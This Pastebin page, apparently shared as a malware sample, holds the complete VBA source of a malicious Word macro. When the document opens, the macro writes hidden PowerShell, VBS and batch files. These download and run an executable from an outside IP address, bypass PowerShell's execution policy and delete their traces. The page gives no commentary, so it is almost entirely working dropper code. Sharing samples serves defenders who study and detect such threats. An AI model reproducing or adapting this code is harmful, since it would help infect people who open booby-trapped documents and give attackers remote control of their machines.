SHARE
TWEET

Malicious Word macro

dynamoo Oct 22nd, 2014 768 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  9. Sub Auto_Open()
  10.     h
  11. End Sub
  12. Sub h()
  13. Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR
  14.  MY_FILEN = "ntusersc.ps1"
  15.  MY_FILE = "ntusersss.bat"
  16.  MY_FIL = "ntuserskk.vbs"
  17.      MY_FILENDIR = ActiveDocument.Path + "\ntusersc.ps1"
  18.      MY_FILEDIR = ActiveDocument.Path + "\ntusersss.bat"
  19.      MY_FILDIR = ActiveDocument.Path + "\ntuserskk.vbs"
  20.      Dim FileNumber As Integer
  21.      Dim FileNumb As Integer
  22.      Dim FileNu As Integer
  23.      Dim retVal As Variant
  24.      FileNumber = FreeFile
  25.      FileNumb = FreeFile
  26.      FileNu = FreeFile
  27.     Open MY_FILENDIR For Output As #FileNumber
  28.     Print #FileNumber, "$hashroot = '13-93-8e-e9-b1-a3-63-63-ed-49-7f-43-3d-5c-a2-c2';"
  29.     Print #FileNumber, "$hash = '0';"
  30.     Print #FileNumber, "$down = New-Object System.Net.WebClient;"
  31.     Print #FileNumber, "$url  = 'http://162.243.234.167:8080/gr/4.exe';"
  32.     Print #FileNumber, "$file = 'crsss2.exe';"
  33.     Print #FileNumber, "$down.DownloadFile($url,$file);"
  34.     Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
  35.     Print #FileNumber, "$someFilePath = $ScriptDir + 'crsss2.exe';"
  36.     Print #FileNumber, "$vbsFilePath = $ScriptDir + 'ntuserskk.vbs';"
  37.     Print #FileNumber, "$batFilePath = $ScriptDir + 'ntusersss.bat';"
  38.     Print #FileNumber, "$psFilePath = $ScriptDir + 'ntusersc.ps1';"
  39.     Print #FileNumber, "Do { Start-Sleep -s 10;"
  40.     Print #FileNumber, "$md5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider;"
  41.     Print #FileNumber, "$hash = [System.BitConverter]::ToString($md5.ComputeHash([System.IO.File]::ReadAllBytes($someFilePath))); }"
  42.     Print #FileNumber, "Until ($hash -Match $hashroot);"
  43.     Print #FileNumber, "cmd.exe /c crsss2.exe;"
  44.     Print #FileNumber, "$file1 = gci $vbsFilePath -Force"
  45.     Print #FileNumber, "$file2 = gci $batFilePath -Force"
  46.     Print #FileNumber, "$file3 = gci $psFilePath -Force"
  47.     Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hidden"
  48.     Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hidden"
  49.     Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hidden"
  50.     Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
  51.     Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
  52.     Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
  53.     Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
  54.     Close #FileNumber
  55.    
  56.     Open MY_FILDIR For Output As #FileNumb
  57.     Print #FileNumb, "currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
  58.     Print #FileNumb, "Set objFSO=CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"
  59.     Print #FileNumb, "currentFile = currentDirectory & " & Chr(34) & "ntusersc.ps1" & Chr(34)
  60.     Print #FileNumb, "Set objShell = CreateObject(" & Chr(34) & "Wscript.shell" & Chr(34) & ")"
  61.     Print #FileNumb, "objShell.run " & Chr(34) & "powershell.exe -ExecutionPolicy bypass -noprofile -file " & Chr(34) & " & currentFile,0,true"
  62.     Close #FileNumb
  63.      
  64.      'creat batch file
  65.    Open MY_FILEDIR For Output As #FileNu
  66.     Print #FileNu, "@echo off"
  67.     Print #FileNu, "ping 1.1.2.2 -n 2"
  68.     Print #FileNu, "cscript.exe " & ActiveDocument.Path & "\ntuserskk.vbs"
  69.     Print #FileNu, "exit"
  70.     Close #FileNu
  71.        
  72.     dir1 = Len(Dir(MY_FILENDIR))
  73.     dir2 = Len(Dir(MY_FILEDIR))
  74.     dir3 = Len(Dir(MY_FILDIR))
  75.     SetAttr MY_FILENDIR, vbHidden
  76.     SetAttr MY_FILEDIR, vbHidden
  77.     SetAttr MY_FILDIR, vbHidden
  78.    
  79.     Do While dir1 = 0
  80.     WaitFor (2)
  81.     Loop
  82.    
  83.     Do While dir2 = 0
  84.     WaitFor (2)
  85.     Loop
  86.    
  87.     Do While dir3 = 0
  88.     WaitFor (2)
  89.     Loop
  90.    
  91.     'Shell "cmd.exe /k " + MY_FILEDIR
  92.    
  93.     retVal = Shell(MY_FILEDIR, 0)
  94.    
  95.    
  96.      
  97. End Sub
  98. Sub WaitFor(NumOfSeconds As Long)
  99. Dim SngSec As Long
  100. SngSec = Timer + NumOfSeconds
  101.  
  102. Do While Timer < SngSec
  103. DoEvents
  104. Loop
  105.  
  106. End Sub
  107.  
  108. Sub AutoOpen()
  109.     Auto_Open
  110. End Sub
  111. Sub Workbook_Open()
  112.     Auto_Open
  113. End Sub
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top